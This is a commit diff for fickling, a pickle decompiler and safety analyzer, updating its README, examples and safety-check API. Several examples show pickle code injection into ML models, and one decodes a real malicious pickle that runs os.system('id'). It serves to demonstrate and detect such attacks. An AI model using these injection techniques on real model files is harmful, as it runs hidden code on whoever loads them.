
Commit

Merge pull request #87 from trailofbits/sh/user
More usability improvements
suhacker1 authored Jan 3, 2024
2 parents 7d40f1d + 34fed7e commit 4ef7f81
Showing 10 changed files with 144 additions and 11 deletions.
4 changes: 2 additions & 2 deletions README.md
@@ -16,7 +16,7 @@ Fickling can be used both as a **python library** and a **CLI**.
* [Pickle code injection](#pickle-code-injection)
* [Pickle decompilation](#pickle-decompilation)
* [PyTorch polyglots](#pytorch-polyglots)
* [About pickle](#about-pickle)
* [More information](#more-information)
* [Contact](#contact)

## Installation
@@ -189,7 +189,7 @@ Your file is most likely of this format: PyTorch v1.3
Check out [our examples](https://github.com/trailofbits/fickling/tree/master/example)
to learn more about using fickling!

## About pickle
## More information

Pickled Python objects are in fact bytecode that is interpreted by a stack-based
virtual machine built into Python called the "Pickle Machine". Fickling can take
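A minimal sketch of that decompilation, using only the `Pickled.load()` and `.ast` APIs that appear elsewhere in this changeset (the object being pickled is an arbitrary placeholder):

```python
import ast
import pickle

from fickling.fickle import Pickled

# Decompile the pickle bytecode for a simple list into a Python AST
fickled = Pickled.load(pickle.dumps([1, 2, 3]))
print(ast.dump(fickled.ast, indent=4))
```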
9 changes: 9 additions & 0 deletions example/README.md
@@ -0,0 +1,9 @@
# Examples

* [hook_functions.py](https://github.com/trailofbits/fickling/blob/master/example/hook_functions.py): Check the safety of all loaded pickle files using `fickling.always_check_safety()` (a minimal sketch of this hook appears after this list)
* [context_manager.py](https://github.com/trailofbits/fickling/blob/master/example/context_manager.py): Halt the deserialization of a malicious pickle file with the fickling context manager
* [fault_injection.py](https://github.com/trailofbits/fickling/blob/master/example/fault_injection.py): Perform a fault injection on a PyTorch model and then analyze the result with `check_safety`
* [inject_mobilenet.py](https://github.com/trailofbits/fickling/blob/master/example/inject_mobilenet.py): Override the `eval` method of an ML model using fickling and apply `fickling.is_likely_safe` to the model file
* [inject_pytorch.py](https://github.com/trailofbits/fickling/blob/master/example/inject_pytorch.py): Inject a model loaded from a PyTorch file with malicious code using fickling’s PyTorch module
* [numpy_poc.py](https://github.com/trailofbits/fickling/blob/master/example/numpy_poc.py): Analyze a malicious payload passed to `numpy.load()`
* [trace_binary.py](https://github.com/trailofbits/fickling/blob/master/example/trace_binary.py): Decompile a payload using the tracing module
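As referenced in the first item above, here is a minimal sketch of the hook-based pattern from hook_functions.py. Only `fickling.always_check_safety()` is taken from this changeset; the exact exception raised on an unsafe file is not shown here, so the example catches broadly, and `unknown.pkl` is a placeholder path.

```python
import pickle

import fickling

# Enable fickling's global hook so subsequent pickle.load()/loads() calls
# are checked for unsafe behavior before deserialization proceeds.
fickling.always_check_safety()

try:
    with open("unknown.pkl", "rb") as f:  # placeholder path
        obj = pickle.load(f)
except Exception as err:  # the exact exception class is not shown in this diff
    print(f"Blocked a potentially unsafe pickle: {err}")
```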
9 changes: 6 additions & 3 deletions example/fault_injection.py
@@ -1,13 +1,16 @@
"""
This is tutorial code for performing fault injections with PyTorchFi:
https://colab.research.google.com/drive/1BMB4LbsTU_K_YXUFzRyfIynpGu5Yhr1Y
Note you may need to run `pip install pytorchfi`
"""
import pickle

import torch
import torchvision.models as models
from pytorchfi.core import fault_injection

import fickling.analysis as analysis
from fickling.fickle import Pickled

# Load AlexNet
@@ -61,8 +64,8 @@

print("\n\nIs this is_likely_safe?")

safety = fickled_unsafe_model.check_safety().to_dict()
print(safety)
safety = analysis.check_safety(fickled_unsafe_model).to_dict()
print(safety["severity"])

# Test more safety checks

@@ -72,7 +75,7 @@
else:
print("❌")

print("Do the AST's match?")
print("Do the ASTs match?")
if fickled_unsafe_model.ast == safe_model.ast:
print("✅")
else:
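A condensed sketch of the analysis pattern this file now uses; only `Pickled.load()`, `fickling.analysis.check_safety()`, `.to_dict()`, and the `severity` key from the diff above are assumed:

```python
import pickle

import fickling.analysis as analysis
from fickling.fickle import Pickled

# Wrap an arbitrary pickled object and run fickling's module-level analysis;
# the removed Pickled.check_safety() instance method is no longer the entry point.
fickled = Pickled.load(pickle.dumps({"weights": [0.1, 0.2, 0.3]}))
safety = analysis.check_safety(fickled).to_dict()
print(safety["severity"])
```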
11 changes: 9 additions & 2 deletions example/inject_mobilenet.py
@@ -2,6 +2,7 @@

import torchvision.models as models

import fickling
from fickling.fickle import Pickled

# Use fickling to override a custom method (.eval())
@@ -15,13 +16,19 @@
payload = '''exec("""type(model).eval = eval('lambda model: print("!!!!We can run whatever custom Python code we want to!!!!")')""")''' # noqa
fickled_model = Pickled.load(pickle.dumps(model))

# Use the insert_python_exec() method to inject the payload
fickled_model.insert_python_exec(payload)
model = pickle.loads(fickled_model.dumps())

print("Running eval()")
model.eval()
print("Finished running eval()")

# Serialize malicious model
print("\n\nIs this safe?")
safety_results = fickled_model.check_safety().to_dict()
print(safety_results["severity"])
with open("malicious_mobilenet.pkl", "wb") as f:
pickle.dump(model, f)

# Determine if the file is likely safe
result = fickling.is_likely_safe("malicious_mobilenet.pkl")
print(result)
5 changes: 4 additions & 1 deletion example/inject_pytorch.py
@@ -13,7 +13,10 @@
# Inject payload, overwriting the existing file instead of creating a new one
temp_filename = "temp_filename.pt"
result.inject_payload(
"print('Hello, World!')", temp_filename, injection="insertion", overwrite=True
"print('!!!!!!Never trust a pickle!!!!!!')",
temp_filename,
injection="insertion",
overwrite=True,
)

# Load file with injected payload
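For context, a sketch of how the truncated example above is typically driven end to end. The `inject_payload()` call and its arguments come from the diff; the wrapper class name `fickling.pytorch.PyTorchModelWrapper` and the file names are assumptions rather than confirmed by this changeset.

```python
import torch
import torchvision.models as models

# Assumed import path for fickling's PyTorch support; not shown in this diff.
from fickling.pytorch import PyTorchModelWrapper

# Save a benign model to disk (placeholder filename).
model = models.mobilenet_v2()
torch.save(model, "base_model.pt")

# Wrap the file and inject the payload, overwriting the temp file if it exists.
result = PyTorchModelWrapper("base_model.pt")
result.inject_payload(
    "print('!!!!!!Never trust a pickle!!!!!!')",
    "temp_filename.pt",
    injection="insertion",
    overwrite=True,
)

# Loading the injected file runs the payload during deserialization.
torch.load("temp_filename.pt")
```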
5 changes: 2 additions & 3 deletions example/numpy_poc.py
@@ -5,6 +5,7 @@

import numpy

import fickling.analysis as analysis
from fickling.fickle import Pickled


@@ -30,7 +31,5 @@ def __reduce__(self):

fickled_payload = Pickled.load(pickle.dumps(payload))

print("\n\nHow likely is this to be safe?\n\n")
safety_results = fickled_payload.check_safety().to_dict()

safety_results = analysis.check_safety(fickled_payload).to_dict()
print(safety_results)
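A self-contained sketch of the kind of payload analyzed above: a class whose `__reduce__` makes unpickling call an attacker-chosen function. The payload is only serialized and statically analyzed here, never loaded, so the `os.system` call does not run.

```python
import os
import pickle

import fickling.analysis as analysis
from fickling.fickle import Pickled


class Payload:
    # __reduce__ tells pickle to reconstruct this object by calling
    # os.system(...) -- the classic pickle code-execution primitive.
    def __reduce__(self):
        return (os.system, ("echo 'malicious payload'",))


# Serialize the payload and analyze it without ever unpickling it.
fickled_payload = Pickled.load(pickle.dumps(Payload()))
print(analysis.check_safety(fickled_payload).to_dict())
```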
2 changes: 2 additions & 0 deletions example/pytorch_poc.py
@@ -1,4 +1,6 @@
"""
Warning: This PoC is out-of-date.
Tested with python3.9
This is tutorial code for generating, saving, and loading models in PyTorch
https://pytorch.org/tutorials/beginner/saving_loading_models.html
88 changes: 88 additions & 0 deletions example/trace_binary.py
@@ -0,0 +1,88 @@
import io

from astunparse import unparse

import fickling.tracing as tracing
from fickling.fickle import Interpreter, Pickled

# Grab mystery binary object
# This comes from https://github.com/maurosoria/dirsearch/issues/1073
mystery = b"\x80\x04\x95E\x00\x00\x00\x00\x00\x00\x00(\x8c\x08builtins\x8c\x07getattr\x93\x8c\x08builtins\x8c\n__import__\x93\x8c\x02os\x85R\x8c\x06system\x86R\x8c\x02id\x85R1N." # noqa
binary = io.BytesIO(mystery)

# Load using fickling
fickled = Pickled.load(binary)

# Trace and print decompiled output
interpreter = Interpreter(fickled)
trace = tracing.Trace(interpreter)
print(unparse(trace.run()))

"""
Expected Output:
PROTO
FRAME
MARK
Pushed MARK
SHORT_BINUNICODE
Pushed 'builtins'
SHORT_BINUNICODE
Pushed 'getattr'
STACK_GLOBAL
Popped 'getattr'
Popped 'builtins'
Pushed getattr
SHORT_BINUNICODE
Pushed 'builtins'
SHORT_BINUNICODE
Pushed '__import__'
STACK_GLOBAL
Popped '__import__'
Popped 'builtins'
Pushed __import__
SHORT_BINUNICODE
Pushed 'os'
TUPLE1
Popped 'os'
Pushed ('os',)
REDUCE
_var0 = __import__('os')
Popped ('os',)
Popped __import__
Pushed _var0
SHORT_BINUNICODE
Pushed 'system'
TUPLE2
Popped 'system'
Popped _var0
Pushed (_var0, 'system')
REDUCE
_var1 = getattr(_var0, 'system')
Popped (_var0, 'system')
Popped getattr
Pushed _var1
SHORT_BINUNICODE
Pushed 'id'
TUPLE1
Popped 'id'
Pushed ('id',)
REDUCE
_var2 = _var1('id')
Popped ('id',)
Popped _var1
Pushed _var2
POP_MARK
Popped _var2
Popped MARK
NONE
Pushed None
STOP
result = None
Popped None
_var0 = __import__('os')
_var1 = getattr(_var0, 'system')
_var2 = _var1('id')
result = None
"""
9 changes: 9 additions & 0 deletions fickling/exception.py
@@ -6,3 +6,12 @@ def __init__(self, filepath, info):

def __str__(self):
return f"Safety results for {self.filepath} : {str(self.info)}"


class WrongMethodError(Exception):
def __init__(self, msg):
super().__init__()
self.msg = msg

def __str__(self):
return self.msg
13 changes: 13 additions & 0 deletions fickling/fickle.py
@@ -30,6 +30,8 @@
Tuple as TupleType,
)

from fickling.exception import WrongMethodError

T = TypeVar("T")

if sys.version_info < (3, 9):
@@ -706,6 +708,17 @@ def has_non_setstate_call(self) -> bool:
object.__setstate__"""
return bool(self.properties.non_setstate_calls)

def check_safety(self):
raise WrongMethodError(
"""This method has been removed. Use fickling.analysis.check_safety()
on the Pickled object instead"""
)

def is_likely_safe(self):
raise WrongMethodError(
"This method has been removed. Use fickling.is_likely_safe() on the pickle file instead"
)

def unsafe_imports(self) -> Iterator[Union[ast.Import, ast.ImportFrom]]:
for node in self.properties.imports:
if node.module in (
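Taken together with the new `WrongMethodError`, a short sketch of the intended migration; all names come from this changeset, and `data.pkl` is a placeholder file.

```python
import pickle

import fickling
import fickling.analysis as analysis
from fickling.exception import WrongMethodError
from fickling.fickle import Pickled

fickled = Pickled.load(pickle.dumps([1, 2, 3]))

# The removed instance method now raises WrongMethodError with a pointer
# to the replacement API.
try:
    fickled.check_safety()
except WrongMethodError as err:
    print(err)

# New pattern for in-memory objects: module-level analysis.
print(analysis.check_safety(fickled).to_dict()["severity"])

# New pattern for files on disk: the top-level helper.
with open("data.pkl", "wb") as f:
    pickle.dump([1, 2, 3], f)
print(fickling.is_likely_safe("data.pkl"))
```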
